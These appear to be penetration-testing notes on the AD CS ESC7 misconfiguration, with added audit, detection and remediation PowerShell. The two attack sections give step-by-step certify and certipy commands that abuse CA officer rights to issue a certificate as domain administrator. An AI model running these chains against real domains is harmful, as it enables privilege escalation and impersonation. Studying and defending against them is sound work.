ESC7
Vulnerable Certificate Authority Access Control
Two sets of CA permissions pose a security risk:
- ManageCA (or ManageCertificates)
- ManageCertificates (or Certificate Manager)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
Query the CA with certutil (EditFlags value). EDITF_ATTRIBUTESUBJECTALTNAME2 is set if the value is 1376590.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
Enumerate using the PSPKI module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
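The two checks above (who holds ManageCA / ManageCertificates, and whether EDITF_ATTRIBUTESUBJECTALTNAME2 is in EditFlags) are what a defender audits on every CA. The script below is an added example, not code from the original notes: it reuses the PSPKI cmdlets and the certutil call shown above and reports only the findings. Assumptions: PSPKI is installed, the CA object exposes a `ConfigString` ("host\CA name") property, the ACE objects expose the rights and allow/deny type under either the newer (`Rights`, `AccessType`) or older (`CertificationAuthorityRights`, `AccessControlType`) PSPKI property names (both are tried), and the `$ExpectedAdmins` list is a constructed sample to be replaced with the principals that legitimately administer the CA.

```powershell
# Added ESC7 audit helper (not part of the original notes). Requires PSPKI and
# read access to the CA configuration.
Import-Module PSPKI

function Test-Esc7Exposure {
    param(
        [Parameter(Mandatory)] [string] $CAHost,
        # Constructed sample list: principals expected to hold CA admin rights
        [string[]] $ExpectedAdmins = @('LAB\Domain Admins', 'LAB\Enterprise Admins', 'BUILTIN\Administrators')
    )

    $ca  = Get-CertificationAuthority -ComputerName $CAHost   # .ConfigString assumed ("host\CA name")
    $acl = $ca | Get-CertificationAuthorityAcl

    # 1. Unexpected holders of ManageCA / ManageCertificates.
    #    PSPKI versions differ in property names, so both spellings are read; a missing
    #    property expands to an empty string.
    foreach ($ace in $acl.Access) {
        $type   = "$($ace.AccessType)$($ace.AccessControlType)"
        $rights = "$($ace.Rights)$($ace.CertificationAuthorityRights)"
        if ($type -ne 'Allow') { continue }
        if ($rights -notmatch 'ManageCA|ManageCertificates') { continue }
        if ($ExpectedAdmins -notcontains "$($ace.IdentityReference)") {
            [pscustomobject]@{
                Check     = 'CA-ACL'
                Principal = "$($ace.IdentityReference)"
                Value     = $rights
                Finding   = 'Unexpected ManageCA/ManageCertificates holder (ESC7)'
            }
        }
    }

    # 2. EDITF_ATTRIBUTESUBJECTALTNAME2 is bit 0x40000 of policy\EditFlags.
    #    certutil prints a line like:  EditFlags REG_DWORD = 15014e (1376590)
    $out = certutil.exe -config $ca.ConfigString -getreg "policy\EditFlags" 2>&1 | Out-String
    if ($out -match 'EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)') {
        $flags = [Convert]::ToInt32($Matches[1], 16)
        if ($flags -band 0x40000) {
            [pscustomobject]@{
                Check     = 'EditFlags'
                Principal = '-'
                Value     = ('0x{0:x} ({0})' -f $flags)
                Finding   = 'EDITF_ATTRIBUTESUBJECTALTNAME2 set: any requester can supply a SAN (ESC6)'
            }
        }
    }
}

# Example run against the lab CA used in the notes above
Test-Esc7Exposure -CAHost 'LAB-DC.lab.local' | Format-Table -AutoSize
```

No output means neither check fired. A hit on the ACL check is the ESC7 condition itself; a hit on the EditFlags check is the post-exploitation state of Attack 1 below, whether the flag was set deliberately or by an attacker.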
ManageCA
A principal holding ManageCA can manipulate CA settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to permit SAN specification in any template, a critical step in domain escalation.
Attack 1
Use ManageCA rights to perform the ESC6 attack. The ESC6 attack was patched in May 2022.
Note: this has no effect until the CA service (CertSvc) is restarted; ManageCA users have the right to restart it, but cannot do so remotely.
- Request a certificate from a template that requires manager approval
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
- Import the PSPKI module
PS /home/bobbuilder> Import-Module PSPKI
- Approve the pending request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
- Download the approved certificate
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Attack 2
For this attack we only need the ManageCA permission. We will also need the Manage Certificates permission (can be granted from ManageCA), and the SubCA certificate template must be enabled (both can be done from ManageCA).
- Grant Manage Certificates access (optional, if we don't already have it)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
- Enable the SubCA certificate template (optional, if it is not already enabled)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
- Request a certificate based on the SubCA template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
- Issue the failed (pending/denied) certificate request
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
- Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
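Both attacks leave a trail in the CA's Security log: Attack 1 changes a CA property (EditFlags) and approves a pending request; Attack 2 grants an officer right, enables a template and issues a denied request. The function below is an added detection example, not part of the original notes, that pulls the relevant AD CS audit events from a CA host and flattens the fields an analyst triages on. Assumptions: the "Certification Services" audit subcategory and the CA's audit filter are enabled (otherwise these events are never written), the caller can read the remote Security log, and the host name is the lab CA from the notes above.

```powershell
# Added detection helper for CA permission/configuration changes and approvals
# (not part of the original notes). Event IDs are Microsoft's Security-log IDs
# for Active Directory Certificate Services.
function Get-Esc7Events {
    param(
        [string]   $ComputerName = $env:COMPUTERNAME,
        [datetime] $Since        = (Get-Date).AddDays(-1)
    )
    #   4882  security permissions for Certificate Services changed  (ManageCA/officer grants)
    #   4890  certificate manager settings changed
    #   4892  a property of Certificate Services changed              (EditFlags, enabled templates)
    #   4887  a request was approved and a certificate was issued     (approval of pending/denied requests)
    $filter = @{ LogName = 'Security'; Id = 4882, 4890, 4892, 4887; StartTime = $Since }

    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Pull the named EventData fields out of the event XML
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        [pscustomobject]@{
            Time      = $_.TimeCreated
            Id        = $_.Id
            Actor     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            RequestId = $data['RequestId']     # populated on 4887
            Requester = $data['Requester']     # populated on 4887
            # 4887 request attributes carry a "SAN:" entry when a SAN was supplied in the request
            SanInAttr = [bool]("$($data['Attributes'])" -match 'SAN:')
            Summary   = ($_.Message -split "`r?`n")[0]
        }
    }
}

# Example: CA permission/configuration changes and approvals in the last 7 days
Get-Esc7Events -ComputerName 'LAB-DC.lab.local' -Since (Get-Date).AddDays(-7) |
    Sort-Object Time | Format-Table -AutoSize
```

A 4882 or 4892 from an account that is not a known CA administrator, or a 4887 whose Requester differs from the approving Actor and whose attributes contain a SAN, is the pattern to alert on; correlate the RequestId with the CA database to see the issued subject.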
ManageCA, Manage Certificates and SubCA
Disable EDITF_ATTRIBUTESUBJECTALTNAME2 with PowerShell
# Assumed (not shown in the original notes): $ConfigReader is a PSPKI CertSrvRegManagerD bound to the CA host
$ConfigReader = New-Object SysadminsLV.PKI.Dcom.Implementations.CertSrvRegManagerD "dc.domain.local"
$ConfigReader.SetRootNode($true)
# 1114446 = 0x11014E: the default EditFlags with EDITF_ATTRIBUTESUBJECTALTNAME2 (0x40000) cleared; 1376590 above is the same value with the bit set
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")
# Read the value back to confirm the change (CertSvc must be restarted for it to take effect)
$ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")